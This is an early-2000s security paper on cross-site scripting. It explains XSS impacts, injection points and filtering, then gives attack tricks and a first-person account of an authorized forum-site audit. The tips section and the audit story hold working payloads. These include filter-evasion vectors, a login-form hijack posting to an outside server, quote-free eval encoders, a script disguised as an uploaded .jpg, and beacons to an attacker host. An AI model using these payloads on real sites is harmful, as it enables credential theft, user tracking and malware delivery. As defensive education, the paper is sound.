Real World XSS

Author: David Zimmer
Site: http://sandsprite.com/Sleuth
Downloads: http://sandsprite.com/Sleuth/small_xss_utilities.zip

-----------------------------------------------------------------
Updated 11/04/03
   -Article Downloads included
   -HTML and downloadable CHM versions now available,
    see http://sandsprite.com/Sleuth/papers.html for links
-----------------------------------------------------------------

Section 1 - Description, and overview
   -Introduction
   -Prerequisites
   -Impacts (Attack Scenario)
   -Impact Summary
Section 2 - Methods of Injection, and filtering
   -Injection Points
   -Injection methods and filtering
   -XSS scripting tips and tricks
Section 3 - Inside the mind, mental walk along of a XSS hack
Section 4 - Conclusion

##################################################################

Section 1 - Description, and overview
------------------------------------

INTRODUCTION
-----------------------

So what is all the media fuss about XSS? For those of you who don't know the acronym, XSS stands for Cross-Site Scripting. It is the term given to the situation where a web page can be tricked into displaying surfer-supplied data that is capable of altering the page for the viewer. This is a pretty broad definition, and I apologize, but as you will see XSS has such a wide range of attack vectors that a broad description is necessary.

We have all seen the numerous Bugtraq postings "XSS FOUND IN MANY MAJOR WEB SITES" and we have seen the examples to prove it does indeed exist, but many of these still leave readers thinking "Ok, so they can throw up an alert box, how dangerous can that be?" This brings us to our first general truth: finding XSS holes is the easy part. Knowing how to creatively exploit them and assessing their possible impact is where the real coding and creativity comes in.
There are many, many documents on the web detailing XSS and giving generalized book definitions of it. What I haven't seen is a practical approach, with example usage outside the bounds of the few default examples usually given. I believe this has made people overlook XSS and not realize its true impact.

For a brief background, I first started my study of XSS about 5 years ago, when I (ab)used it playing pranks in 'no rules' html chatrooms. From there I branched out, using my knowledge and abilities to help secure sites and perform web application security audits. I have a personal fascination with programming and web technologies and have grown very familiar with Windows programming, ASP, databases and other web technologies.

The knowledge contained in this document is a summation of these years of study, experience, intuition and experimentation. Many of these concepts are things that I was introduced to by piecing together bits of information and conversations over the years. I am presenting them all here together in one document because I have yet to find a comprehensive resource detailing the exact impacts in conversational, real world scenarios.

Prerequisites
---------------------------------------------

Some topics basic to this document are an understanding of URL structure and some knowledge of html and JavaScript. Additionally, knowledge of URL encoding, http request methods and web application technologies such as ASP would be helpful.

XSS IMPACTS
----------------------------------

Before we look at the specifics of how these page alterations are possible, let's take a step back and enumerate some of the possible impacts XSS can have on your web site. The root question we should ask ourselves is: what could an attacker be trying to gain by using XSS?

1) Theft of Accounts / Services

Of course the first thing that comes to mind when XSS is mentioned is cookie theft and account hijacking.
In fact, one of the default XSS examples shown to the public is alert(document.cookie), signifying the importance and inherent dangers of a third party being able to execute arbitrary web code in the client's browser. In a fair number of cases, especially with older web applications, a stolen cookie can easily lead to account hijacking. This occurs when the cookie is used to hold all of the verification information on the client side and nothing is tracked on the server as to the surfer's state or credentials.

Some common motivations for this category would include:

   Identity theft
   Accessing confidential resources
   Accessing pay content
   Account denial of service

2) User Tracking / Statistics

Another usage of XSS is in gaining information on a site's web surfer population. As an experiment some time ago I set up a simple mechanism where I could literally monitor people's clicks through a vulnerable site. Yes, this is perfectly possible, and indeed was shockingly easy to do. Had I taken the experiment a step farther I could have also linked each surfer's email address to their surfing habits and interests, the kind of stats advertisers and spammers dream of.

3) Browser / User exploitation

The second most common example of XSS exploitation provided is the venerable alert('XSS Example') script. A simple alert box is a very tame example of the type of attacks that fall into the category of user exploitation. One visit to Georgi Guninski's site or a review of some of the browser exploits discovered by ThePull should be enough to make anyone realize that surfing the web can be a dangerous experience.

Imagine if I had, in the above example, not just tracked users, but had instead been trying to actively exploit them? I could have used an unknowing web site to disseminate my malware to thousands of unsuspecting victims all at once!
A couple of things that I should also mention, that may not be too obvious with this style of attack, are:

   a) To a casual surfer, your site is the hostile site.
   b) I can be leveraging off of the credentials of your site. E.g. say Microsoft.com had a XSS hole that someone exploited like this. If I were to utilize an unsafe ActiveX control in my exploit, surfers would take into account that this was after all Microsoft, and they very well may click ok to run it, even if they would not on other sites.
   c) I have a much, much higher distribution rate and even a tighter target audience than I would through many other distribution types.
   d) I don't actually have to exploit them, I can just steal them all from your site and bring them to mine.
   e) I might not even care about abusing your site, I might just care about the number of surfers I can hit and force into actions on other third party web sites.

The sub category of user exploitation is a subtle variation, but a distinction worth making. Browser exploits rely on specific security holes in specific versions of web browser software. User exploitation is the act of forcing users to take actions on your behalf. These can include privileged actions only they can perform, like account modifications, sending email etc., or they can just be used to force random unsuspecting web users to take general actions and give me an abstraction layer in the chain of evidence.

4) Credentialed Misinformation

One of the most dangerous, yet often overlooked, impacts is Credentialed Misinformation. Once we have active scripting executing in a browser, we can do pretty much anything we desire with the page's content. If you were a large trusted news site, this could be quite a dangerous thing.

Imagine seeing a link on a messageboard or in an email saying that there was a reactor meltdown on the west coast and thousands were dead and injured. The site was clearly a legitimate large news site and a trusted resource.
The url looks legit, is only about 50 characters long and raises no suspicions. When you get to the site, you are horrified to read through the pages of graphic detail. How can this be? With a XSS vulnerable site...it could quite possibly NOT be.

Misinformation attacks are not limited to news sites. With but a minor twist and a quick jaunt of thought, my original email message could have appeared to come from some popular web site you have an account with, asking you to visit this page to renew your password as a security measure. Again the url aims directly into the heart of your beloved site, so you think little of it and just fill out the information. What you don't see behind the scenes is that the crafted url you clicked on got your browser to display a phony login page created by a malicious author, and that the form just submitted all your login information to him. Congratulations, you have been duped with the help of a XSS vulnerable site, and you will probably never know it.

5) Free Information Dissemination

With the concept of page rewriting under our belts from the misinformation discussion, free information dissemination is one of the next logical realizations we come to. Let's say I have a message I want to get out, like SPAM or some political extremist message. In both of these cases it would be desirable for me to limit my personal attachment to the message and further draw out the evidential chain leading to me.

Again I can utilize a XSS vulnerable site to show my message. All I would need to do is post a crafted url on some messageboard. If the message was relatively short I could include it all inline in the url and not have to worry about exposing my own web hosting account and linking it to the message.

6) Other

This category is included for the simple fact that there are as many types of attack possible as there are attackers, motivations and technologies available to exploit.
A couple of scenarios that might fall into this category would be using random web users as an abstraction layer, forcing their browsers to silently make exploitive requests to other web servers. This blind proxying would again lengthen the evidential chain leading back to you.

Another technique would be to use a XSS vulnerable site's large user base to chew up a smaller site's bandwidth. Just insert a 1x1 image whose src is the largest image on the target site. With a large enough viewing audience you could effectively chew up the target's bandwidth for a while.

Finally there are techniques that aren't really scripting attacks but are still html injection attacks, and are worth mentioning because the filtering is still in our ballpark. Html injection attacks are ways to insert malicious html to wack someone's web pages. A couple of brief examples will be covered down in the filtering section.

XSS IMPACT SUMMARY
------------------------------

Now that you have seen some of the possible uses of XSS, we shift gears slightly and summarize its strengths and weaknesses as an attack vector.

Strengths

   1) Can reach a very large and targeted audience with one injection point. In some instances it can hit every single user of your web application at once and be present on every single page they visit.
   2) Can force a user into any action they are able to take, and can potentially access any information they can access.
   3) Can be hard to detect and can be slipped in quietly. The chain of evidence can be drawn out, and it may not be readily apparent how the exploit or actions occurred.
   4) Can be a powerful tool for information display and alteration. With the advanced features of IE and dynamic html, every portion of a page's content can be changed on the fly through active scripting.

Weaknesses

XSS is 95% avoidable with proper filtering techniques on any user supplied data.
While making sure that every element is filtered in large (and especially legacy) web applications can be a daunting task, properly implemented filters can prevent your site from falling victim to the above mentioned attack scenarios. To date there are several commercially available tools that will scan your web application and automate the time-consuming task of XSS enumeration. One such tool is of course WebInspect from SPI Dynamics.

What is the 5% that is unavoidable? Reality. We have to accept that web applications can be huge tangled beasts to edit and secure, that even a small last minute modification can have unforeseen impacts, that no one can catch everything, that as new technology, browser capabilities and attack concepts emerge filters have to be reevaluated, and finally that there is nothing called a sure thing (tm). In the end it's always better to know your process capabilities and accept the reality of the unforeseeable.

###############################################################################

Section 2 - Methods of Injection, and filtering
-----------------------------------------------

INJECTION POINTS
----------------------------

The next logical step in understanding XSS is to enumerate its injection points. Where can our web applications fall victim? Since XSS works as an interaction with active server content, any form of input should be filtered if it is ever to show up in a html page.

The default example, and the easiest to exploit, is parameters passed in through query string arguments that get written directly to the page. These are enticingly easy because all of the information can be provided directly in a clickable link and does not require any other html to perform.

Many web authors feel that making their page only respond to POSTed inputs gives them an added layer of security against these types of attacks.
While this can be true if coupled with other preventive measures, anywhere I can inject a html form and have the user click a submit button, I can get them to post to a form (and yes, the form can be hidden and the submission easily automated).

The above two examples describe active XSS attacks. That is to say, ways in which a user has to take an action and make a choice to be hit with a XSS attack. This gives the user the opportunity to examine the link or to discover us, which is no good from the exploiter's view. Sure it works, but it is too dependent on us not getting caught and on the user caring enough to take some action.

More dangerous are passive XSS attacks. These are defined as attacks I can perform where the user will not have to take any action, will not have to click on any link, and will have no idea that anything out of the ordinary is occurring. These attacks occur automatically and can hit very, very large audiences completely silently.

If the user has to take no action, how does the malicious data make it to them? Database storage. Think of a messageboard. If I were able to post active scripting in my post, anyone who viewed my page would automatically be executing whatever I could cook up without even knowing it. Think laterally for a second and you will quickly realize that any data your web app stores that eventually makes it back for surfer viewing is potentially a target for a malicious user to create a passive XSS attack with.

This is how I achieved the XSS user tracking mentioned in the above example. I was performing a security audit for a large forum site. The site allowed users to post articles and discussions and kept a marquee of the top 10 as part of its default page template. Every single page on the site had this marquee, and through parameter manipulation and its subsequent database storage, I was able to have the server output my tracking code to every single surfer that was on the site.
I sat back, watched and catalogued all of the site's users as they navigated amongst the pages. Had this not just been a demonstration, I could have literally linked usernames and email addresses to those observed surfing habits. Probably not something you would desire for your prized user base.

Sites that are particularly vulnerable to this form of attack include guest books, html chatrooms, messageboards, discussion forums etc. If you have any of these on your site, pay particular attention to filtering user supplied data. If you do find a XSS hole on your site, you must also make sure to scrub your database to break any existing code that may already be stored away. When you are doing the filtering remember to use case insensitive searches. It is a simple mistake, but much too easily overlooked.

Another note worth throwing in here is that as business apps with private intranets and integrated web applications become more prevalent, even Windows developers have to start concerning themselves with the dangers of cross site scripting. In a humorous example, the other day at work I was able to enter html code in a business app we are developing, which in turn was displayed in the web app interface we had integrated with it. This adds a whole new dimension to XSS and even Sql injection attacks, but alas I digress.

One last injection point to consider is your error pages. Some servers include special "404 Page Not Found" or servlet error messages that detail the page that was requested, or the parameters passed in. If these elements are not filtered they provide a perfectly overlooked breeding ground for XSS injection.

INJECTION METHODS AND FILTERING...
-----------------------------------------

Now that we have a handle on the breadth of the problem, and where the malicious input may come from, we have to understand just what data may be thrown at us and how to combat it.
Active XSS is relatively easy to prevent by filtering out a series of characters in any user input received. Since each page has a defined window of inputs, they can all be filtered in a quite logical, sequential way.

When we migrate to shielding against passive XSS attacks it is somewhat of a different story. Often user information and data is taken in through a series of web forms, and the final pages are a conglomeration of many users' supplied data. Of course, again all input data must be filtered, but typically there are many more places for errors to crop up. This problem is compounded by the desire of many of these types of data storage web applications to allow the user to enter some html inputs.

Html is a very dynamic and free flowing language. That is something that allows the web to be as advanced and colorful as it is, and also something that can make it a nightmare to parse and filter. To make matters even worse, browser technology and features are expanding at an incredible rate. While this makes the web fun and dynamic, it makes the security auditor's job more difficult. How can you expect a legacy web application to take into account new features, protocols and attack vectors? You can't.

The easiest way to deny cross site scripting (and probably the only really secure way) is to deny users the ability to use any form of html in their data. If you would like to allow html, just realize that your filtering routines must be designed very wisely. Many very large, high profile sites have had XSS holes discovered in them as the result of filter loop holes, including Yahoo and Hotmail.

The next logical step is to see some examples of just how XSS can get inserted into a page. I have created a simplistic asp page that will walk you through some common injection points and example exploitation of them. Please take a few minutes to read through it and play with the examples. To see how it all works, right click, view source and identify where the injection occurred.
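To get a feel for the simplest case before opening the demo page, here is a minimal JavaScript sketch (not the demo page itself) of a query string value being written straight into a page. The renderGreeting function and the name parameter are made up for illustration only.

```javascript
// Hypothetical page builder: writes a query string value into html unfiltered.
function renderGreeting(queryString) {
  const params = new URLSearchParams(queryString);
  const name = params.get("name") || "";
  // The bug: name is user supplied and goes into the page as-is.
  return "<html><body>Hello " + name + "</body></html>";
}

// A normal request, and a crafted link carrying a url encoded script block.
const normal = renderGreeting("name=Dave");
const crafted = renderGreeting(
  "name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
);

console.log(normal);
console.log(crafted);
```

Viewing the source of the second page would show the script block sitting right after "Hello", which is the injection point.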
[ insert url of demo page here ]

FILTERING
----------------------------------------------

Filtering can be both a relatively simple matter and a vastly complex one, all at the same time. The incongruity lies in the extent of your needs. Your server side scripting language of choice can also help you minimize your exposure. Before we get into active server languages, let me admit I am most familiar with asp, so that is where the heft of my examples shall rest.

Let's assume you have a parameter coming in that you expect to be an integer. That assumption can often be your downfall, which incidentally is also why these types of parameters are often found to be sql injection points as well. Anyway.. integer types are easy to filter. Actually we can let the ASP engine cleanse these for us in one step. Consider the asp line:

   x=cInt(Request.QueryString("num"))

What happens if our friend num is not an integer? The ASP engine throws an error:

   Microsoft VBScript runtime error '800a000d'
   Type mismatch: 'cint'

Well, that handles that. In perl I believe simply adding +0 to the variable will have a similar effect and force the variable to be numeric.

But what about string types? That is where the brunt of the work is going to lie and where all of the problems begin.

If we do not want to allow any html input whatsoever then our job is simple. Remove all < signs and quotes and we should be pretty safe, as long as any html attribute we insert into dynamically is always wrapped in quotes.

Note what happens if our page source writes the value into an img src= attribute without quoting it. In that case removing quotes and < will make it very hard for an attacker to create a usable attack, but I would not venture to say it is impossible. Since the src= attribute is not quoted in any way, there is nothing for them to have to break out of. If the img value merely contains a space they will effectively be out of the src= attribute and able to insert their own code, such as onerror=.
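The easy cases above can be sketched roughly as follows. This is JavaScript rather than asp, purely for illustration, and the helper names (toIntegerOrThrow, stripMarkupChars, quotedImg, unquotedImg) are hypothetical, not from any library. The integer check is in the spirit of the cInt() line, and the last two calls contrast the quoted and unquoted src= cases.

```javascript
// Hypothetical helpers for illustration only.

// Integer parameters: refuse anything that is not purely digits,
// in the spirit of letting cInt() raise a type mismatch for us.
function toIntegerOrThrow(raw) {
  if (!/^-?\d+$/.test(String(raw))) {
    throw new TypeError("Type mismatch: expected an integer");
  }
  return parseInt(raw, 10);
}

// String parameters when no html is allowed: drop < and both quote characters.
function stripMarkupChars(raw) {
  return String(raw).replace(/[<"']/g, "");
}

// Quoted attribute: the stripped value has no quote left to close the string.
function quotedImg(src) {
  return '<img src="' + stripMarkupChars(src) + '">';
}

// Unquoted attribute: a space alone is enough to start a new attribute.
function unquotedImg(src) {
  return "<img src=" + stripMarkupChars(src) + ">";
}

console.log(toIntegerOrThrow("42"));
console.log(quotedImg('x" onerror="alert(1)'));
console.log(unquotedImg("x onerror=alert(1)"));
```

In the quoted case the whole input stays inside the src value. In the unquoted case the same filter lets onerror= through as a separate attribute, even though the attacker never typed a quote or a < sign.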
Even though technically they will be able to execute code with this technique, scripting without the use of quotes is extremely hard (or at least I haven't discovered the trick to it yet). See the tips and tricks section for some techniques I am playing with to try to work around it.

The last category, and the most in-depth to cover, is the technique and considerations of allowing only some html content while trying to deny the use of malicious html and scripting. Users of these techniques include web mail providers, message boards and html chatrooms.

Before we go into script filtering we should expand on the definition of malicious html some. If an attacker's goal is only to wack your site, he might be just as content to make your new message board unusable to others as he is to use it to exploit all your surfers. This could easily be done through pure html tags with no attributes. It is doubtful that you would want your users to have the ability to enter a tag that would turn the rest of your html page and forms into an unusable blob of text. It is also unlikely that you would want them to embed a 10000000 x 10000000 image of two elephants mating.

When it comes to allowing users to post html, just beware that you are in it for the long haul, both in maintaining your filters against current technological demands and in accommodating for non script based attacks.

Enough digression. On to the filters.

A good disclaimer to enter here is that I am not that experienced in creating keyword filters. When it comes to my own projects I exclusively allow no html. I do however have a lot of experience working around filters and have read a lot of discussions, so with that in mind, here we go.

The only sane implementation I have heard of is allowing a very confined list of html you want to allow and denying all other tags. This could be implemented by splitting the text blob at all < signs and then reading up to the first space in each element to see what the tag type was.
If the tag was recognizable and allowed, then grab the offset of the closing > and replace the substring with a clean, no attribute version of it. If the tag was not allowed then it would be removed. If the tag was not allowed and did not contain a closing > then I would ummm, I don't know, I would have to define the filter and experiment a lot :)

For tags where you absolutely had to allow attributes, such as img src= tags, I would grab the necessary src= attribute, validate it, and then insert it into my own clean img src= tag so I didn't have to worry about any event handlers or lowsrc or dynsrc or the like. The same technique would be applied to href= attributes.

A safe list of tags to allow along these guidelines would be:

   <font face= size=></font>
   <b></b>, <i></i>, <u></u>
   <img src=>
   <a href=></a>
   Etc. etc.

Really this is probably all I would allow by default. If you need more, follow the above guidelines on implementation.

So assuming you follow the above guidelines and allow no tags and no attributes other than those you copy over to the saved data, what will you have to validate to make sure your users are safe? If the above list is all you allow, I will assume you can manage validating the font size= and face= parameters. Img src= and href= are two big ones, worthy of many debates and carrying many dangers that I will attempt to present next.

Let's first look at our img src tag. We have cleansed it of all the tricks of lowsrc, dynsrc, event handlers and style elements simply by parsing out the src= element. Now we must validate it. I am walking through thoughts here as we go, so please forgive any jumps.

   1) We have to quote the src= string to be safe and to accommodate urls with spaces.
   2) We should remove all single & double quotes in it.
   3) I would reject any urls with ? querystring identifiers in them and make sure that they did not have .cgi, .pl, .php, .asp etc. in the url.
      Sure, we could make a .jpg a perl script, but we can't account for every loop hole and this is already an overcautious measure against webbugs.
   4) Next I would check the protocol. I would deny anything that wasn't explicitly http://

So what do these filters protect against?

Quoting the string makes sure they cannot escape the element attribute and insert their own event handlers. This must be done in conjunction with step 2, removing all quotes. Actually you probably don't have to remove both kinds, just the kind you use to quote the string in your src= element.

Denying all urls (for img src anyway) that have a ? or a reference to a server script would deny users the ability to webbug your surfers. The danger of webbugs is that someone can collect stats on your users and site and track users across pages by their referrer.

!!Note that any link aiming off server will reveal http referrer headers. This is a major reason why web developers are told not to include important info in query strings, and how I used to collect admin logins to chat servers :P (It may also be a good idea to add target=_blank to all links to avoid a possible referrer leak, [but there will always be a referrer leak for img src tags])

Next we validate the protocol. For obvious reasons we probably don't want to allow the file:// protocol on links or images. For equally obvious reasons vbscript: and javascript: would be an unpleasant experience. In the end it is best not to worry about what is there, and only worry about what isn't. No http:// at the beginning of the string, then deny the tag. The reason is that it is relatively easy to add protocol handlers to Windows. Aim:// has its own that may have been found vulnerable, as does icq://. If these protocols are present in an img tag, that may be enough to make the browser fire the registered program type.

As a humorous example, back in the days of IE5 I used to embed an img src=telnet://myip:23 and then run a custom daemon.
All of a sudden my friends would complain that some window had popped up and that someone was typing text to their screen! Heh, parlor tricks, gotta love em. On a more serious note, you can see the possible danger.

One other thing I just thought of is the possible danger of line break tricks. If you follow the above explicitly you should be ok, but if you were to vary at all you should be aware that there is a whole subsection of filter bypassing techniques based on inserting CR, LF or CRLF into input strings. I have also seen javascript execute with a -> breaking it up. Consider how these may impact your filters.

That should give you the basis for a sane implementation of a minimal content keyword filter. If you try to base your filters off of just replacing keywords you are going to run into all kinds of complexities like new elements, attributes you didn't know about, weird event handlers, script encoding, and even multiline tags that can throw your parsing for a loop. If you want to try any of those techniques, may the force be with you luke *breathes like darth vader*

XSS SCRIPTING TIPS AND TRICKS
---------------------------------

Well, I couldn't resist this section, this is where I have my most fun anyway. These are some of the techniques people can hit you with using XSS.

Q) Just how much script can you inject in an image src tag?

A) It's a different style of coding but it can get quite complex :)

----------------------
<img src="javascript:txt='UghhOghh.!!! My Screen Just Ran Away!!!';
txt2='Now come on you have to admit that was funny *S*';x=0;y=80;
function niceguy(){nice=confirm(txt2);
if(nice==1){window.setTimeout('parent.window.moveTo(0,0)',2100)};}
function ha(x){parent.window.moveTo(x,y);if(x==1800)alert('Hehehe...me went Bye-bye ; )');
window.setTimeout('if(x!=1800){ha(x+=30);}else{niceguy()}',25)};
alert('*Yawn*..me tired');ha();">
----------------------

Q) What are the biggest tricks useful in XSS javascripting?
1) Knowing how to embed nested quotes is a necessity. You can escape quotes in a quoted string like this \' or \", or you can use the unicode equivalents \u0022 and \u0027

   ex: alert("\u0022") or alert("\"")

2) Keyword filters that allow any js to execute are useless.

   ex: a='navi';b='gator.userAgent';alert(eval(a+b))

3) Short input length + script block embed = unlimited script power, if you can squeeze in a script src=

4) SSL pages warn if script src= comes from an untrusted site, but if you can upload anything to the server, like an image or article that is actually .js file commands, you can bypass this warning with script src=file.jpg (also useful to help bypass input length requirements). Also note IE doesn't care a wink about file extensions on script src= files :)

5) You can read an entire page's content with javascript in IE, not just manipulate form elements. You can also edit the page on the fly. Learn your dhtml object model danielson!

6) Event stealing: say a page with a log in form has a XSS hole,

   document.forms[0].onsubmit=myfunction
   document.forms[0].btnNew.onclick=myfunction
   document.forms[0].action="http://myserver/myscript.asp"

7) Styles trickery. I have to learn these tricks too! But from what I have heard hinted at and mentioned in passing, there are some cool power tricks to be had!

8) Be familiar with methods of script encoding.

   <img src='vbscript:do%63ument.lo%63ation="http://www.yahoo.com"'>
   <IMG SRC="javascript:alert('test');">
   <IMG SRC="javasc ript:alert('test');"> <-- line break trick

   \09 \10 \11 \12 \13 as delimiters all work.

9) Working with no quotes (also necessary when dealing with injection on php scripts). With php scripts any " or ' we inject is automatically turned into \" and \' respectively :( This is a big problem for complex scripts.
   It kinda works ok for event handler insertion. We can still close the parent quotes, because html doesn't understand the \" escape sequence and only sees the ". This would let us use simple things where we could get away with only using strings already found in the document, numbers, variables, etc. But what if we need to include our own string? Chew on this:

   regexp = /this is my string its actually a reg expression/
   alert(regexp.source)

   I haven't really decided how useful an evasion this is yet. I myself am still chewing away like overcooked steak. With this we can get away with no quotes. However the / characters which we need for urls are special chars and need to be escaped in the reg exp, and php takes \ (which is the reg exp escape char) as an escape char and escapes it to \\, so that is confusing. However we also have the power of regexps in our toolbox and we have a host of built in objects to generate and build up strings from, so something like:

   n=/http: myserver myfolder evilscript.js/
   forslash=location.href.charAt(6)
   space=n.source.charAt(5)
   alert(n.source.split(space).join(forslash))
   //document.scripts[0].src = n.source.split(space).join(forslash)

   A little tricky but doable. That chewed well after all *yummie*

   Another trick that could be useful with the no quotes hack is a simple script encoder such as the below example:

   pcent=/%/.source
   str=/20616c657274282774686973206973207265616c6c7920636f6f6c212729/.source
   temp=str.substring(0,0)
   for(i=0;i<str.length;i+=2){temp+=pcent+str.substring(i,i+2)}
   eval(unescape(temp))

   Voila, complex embeddable scripts with no quotes or forward slashes.

##################################################################

Section 3 - Inside the mind, mental walk along of a XSS hack
-----------------------------------------------

In this section I am going to document some of the actual scenarios I have found in the wild and what could be done with them. In essence these are some of the experiences that made this paper possible.
All of the holes I am going to document here were in a large forum / community type site that shall remain anonymous. All of these tests were done legitimately with the blessing of the site's owner and were matters of testing as I conducted a security audit on his site. Every tester knows how monotonous churning through page source and repetitive tests can be, so I took it upon myself to play and experiment, to see what I could squeeze out of some of these seemingly innocuous holes and to gauge the real impact of these forms of attack.

Before we get started with the details I will describe the web site a little more. The site in question was a large forum type site. Users could log in, browse other users' articles and submissions, and leave messages for each other on numerous messageboards. Each user also had an account modification section where they could update their stats and manage their submissions to the site. The main site consisted of a template with search engine functionality as well as a ticker of the most recent articles submitted by users. This is a relatively large site with anywhere from 3 to 10 thousand users online at any given time.

As the audit progressed I soon found that by going to the user management interface I could embed img src scripts and other html in the author name field. Reflecting back on the layout of the site, I knew that this would allow me to execute scripts on anyone who visited one of my submissions. I also knew that this would execute anytime my name turned up as a result from the site search functionality.

Now the gears start churning, hummm what can I do with this? Since I am the curious type (and maybe a touch mischievous) I decided it would be a worthy cause to play with the hole and try to gauge the actual impact.
The first thing I wanted to determine is how popular of a cat I am ;) (Or in more professional terms, how often my pages were being viewed and the scope of the injection vector.) Since I could insert img tags, this much could have easily been done just by inserting an img src=http://myip and then watching server logs, but since this is a cross-site scripting paper, and that is too boring, I decided to play with some other techniques.

Just for fun I thought it would be cool to try to use the img tag to inject a full script into the page. Of course this can be done inline with creative javascript, lots of semicolons and specially designed strings and functions as in the above example, but that is a lot of work. Wouldn’t it be nicer to just be able to inject a whole script file and not have to worry about complex messy embedded commands? Of course it would.

So how do we get a hapless image tag to do this, and moreover how do we do it so that unsuspecting web surfers don’t notice a thing? Having the site we are auditing all of a sudden get whacked by a bunch of kids who noticed the hole because we were playing with it would just be not good. So we will just have to be a little sly and a little careful.

If we inject an image with a non-existent url, it will fire the onerror javascript event handler, but it will also leave that ugly little broken image placeholder in the document. Sure, those raise little suspicion and are commonplace, but I still see it as evidence. So with this in mind we will img src a 1x1 pixel transparent gif image that will load seamlessly and be undetectable to anyone browsing the page. Loading an image successfully fires the onload event handler, and here is where we can put our payload, with a url such as this.
img src='http://valid address/clear.gif' onload='document.scripts(0).src="http://myserver/evilscript.js"'

Examining the above code you will see that instead of trying to embed some long complex nested javascript inline, I chose just to set the script src of the first script on the web page to be my script. This makes the browser (IE6 anyway, others untested) load my script and execute it. My EVIL script in this case was just a one liner, a simple

document.write('some innocuous text')

In this way I get to play a little, I get to see who loads a page with my name on it, and I coat it over so that they never know the difference. The text contained in the document.write code appears right inline in the page next to wherever the img src code executed. I set up my smallserver to dish out the script file (a small web server package I made especially for playing with xss holes that logs directly to screen and is included in the support file zip).

With the above in motion I went back to the site, logged in and changed my name to include the injection script. From the site stats atop the page it appeared that there were some 3000 potential victims.. err test subjects.. afoot. I submit the data and then quickly hop to one of my articles to make sure all is working as planned. Sure enough, up pops a request on my server's screen and there is my innocuous inline text. So far so good, now the waiting game has begun as I anxiously and nervously await the results.

Wait, wait, wait, hit ! This is just like fishing :) Slowly request after request rolls in. I casually wade through the data I am collecting with a giggle, noting the browser people are using, whereabouts in the world they are from, and what search topics they had requested that had turned up my name. After about 5 minutes of data trolling I decided I had indulged my curiosity enough and was ready to move on.
The 5 minute collection yielded 20 hits, which doesn’t sound like a lot given that there were 3k plus people online, but it should also be noted that I only had 8 articles on the site out of hundreds of thousands. Had I been a little more daring I probably should have expanded the test a little to do some simple script tests to see what percentage of the user base I hit had been actually logged into the site at the time. But that is borderline unethical, so I let it be.

With that experience under my belt I got to thinking: given enough time and fewer morals I could have collected all kinds of stats on users, stolen account info, email addresses etc. (yes, full login information and email addresses were held in the cookies of logged in users on this site). Morals being what they are, I instead shifted my attention to a bigger hack. I wasn’t satisfied that I could slowly trickle in info..I wanted INFO and I knew that it was out there. 3k users online...humm how can I impact them all?

In the days to follow, further examination of the site revealed that in one of the asp interfaces I could inject scripts into the article name pane, but it had to be done in 45 characters or less. Again examining the layout of the site to gauge the impact, I found that as in the above example it would hit users who returned me as a result of a search. However this time, if it was a new article submission that still appeared in the ticker, my code would be output to every single user on the site at once and be on every single page they visited!

My heart thumped as my head swam in ideas of the things I could do. I could track users across pages, I could correlate email addresses to viewing preferences and topic searches. I could literally build a profile of the surfer and even do it in a personal way. What marketing firm wouldn’t love those kinds of stats? A more malicious individual could also take other routes such as account theft, redirecting surfers to other sites etc., but since we have already covered the dangers and why you should be wary of XSS we won’t dive into that again.

Ok, so if I can inject a script in 45 chars or less, thousands of users' info will be at my fingertips. hummm.

<script src='http://geocities.com/dzzie/x.js'></script> = 55 characters

Junk. Nosing around the site some more, I remembered that it had upload functionality for user documents, zips, and author images. User documents were always inserted into the site's template so they weren’t usable for this. The zip files were scanned and opened to make sure they didn’t contain any viruses. This left us with the author image upload. Luckily, after upload the 'picture' was just given a server defined name and stored to disk without being validated or resized as an image. Perfect :)

So I create my evilscript file and rename it something.jpg. I go to my user manager and upload it as the author image for my bio. Then I go to my bio page and snag the url and name the server gave my file

/images/778237.jpg

Just to double check it was still valid I fired up WebSleuth and made a raw http request for the resource. Sure enough it spit out my script file and no extra data. Going to craft my injection string, I try on the fit of my new url

<script src="images/778237.jpg"></script> = 41 characters

Cool, I can just sneak in the script with room to spare. Just to be thorough I go back and edit one of my old submissions with a simple safe script. Sure enough IE loads the script without a complaint about the extension and we are in business.

Soda in hand, interface pages bookmarked, I set out for some more stat taking. I knew the test was going to work, and I knew the impact, but somehow that little kid in you just has to pop out and have his moment of fun, just to say you did it. I submit a new article, I hop to my bookmarked page to edit the article (where the validation hole was), paste in my injection string and submit.
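The character counting above is easy to double check. The following is a small sketch that measures the two injection strings quoted in the text against the 45 character limit; the constant and function names are made up for illustration.

```javascript
// Field limit described in the text.
const LIMIT = 45;

// The two candidate strings, copied from the text above.
const remoteTag = "<script src='http://geocities.com/dzzie/x.js'></script>";
const localTag = '<script src="images/778237.jpg"></script>';

// Hypothetical helper: does the string fit in the limited field?
function fitsLimit(text) {
  return text.length <= LIMIT;
}

console.log(remoteTag.length, fitsLimit(remoteTag)); // 55 false
console.log(localTag.length, fitsLimit(localTag));   // 41 true
```

The absolute address costs 31 characters on its own, while the relative path to the uploaded file costs 17, which is the whole difference between not fitting and fitting with 4 characters to spare.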
Now since the script resided on the server, I could not watch user stats roll in from requests of the script file itself. How then did I collect stats on the users on the site? Here is another thing worth understanding about cross-site scripting: data collection methods. How did I not detail this above?

Anyway, my script is executing on all of these random users' machines from locations across the globe. How do I receive the data the scripts collect? There are a lot of ways to collect the data. You can collect it by watching server logs as we did in the first example, or you can collect it by forcing the users to submit data to CGI scripts which neatly break down and process the data. The problem with both of these techniques though is that they require some level of commitment on the attacker's part, to either reveal his own IP or to reveal one of his web hosting accounts. Of course there are many anonymous ways as well: submitting data to a rogue CGI mailer script, forcing the user to post to an anonymous messageboard or guestbook script, or even using an unsuspecting trojaned user as a data collector. In the end, tracking these types of attacks can be very very tricky if not impossible if they are done right, but we aren’t going to get into all those possibilities now.

For our application we are simply interested in what browser the users are using and what page they are on. Luckily both bits of information are standard browser information leaks given out with any request for a web resource. To keep the test as simple and non-damaging as possible I chose to just use a small javascript that would change the img src of one of the document's images to be the url of a cgi script I had running on one of my hosted accounts. Another thing I had to consider in such a stunt was that I couldn’t use my own ip or server, for two reasons.
Thousands of hits would QUICKLY flood my connection and could quite possibly DOS me to the point I couldn’t keep up with the cgi data, and I could probably be web whacked for quite a while, not allowing me to change back the data to effectively "turn off" the onslaught. Why web whack yourself if you don't need to, right ;)

So, the script commands in the jpg file were this

document.images(0).src="http://myserver/cgi-bin/logit.pl"

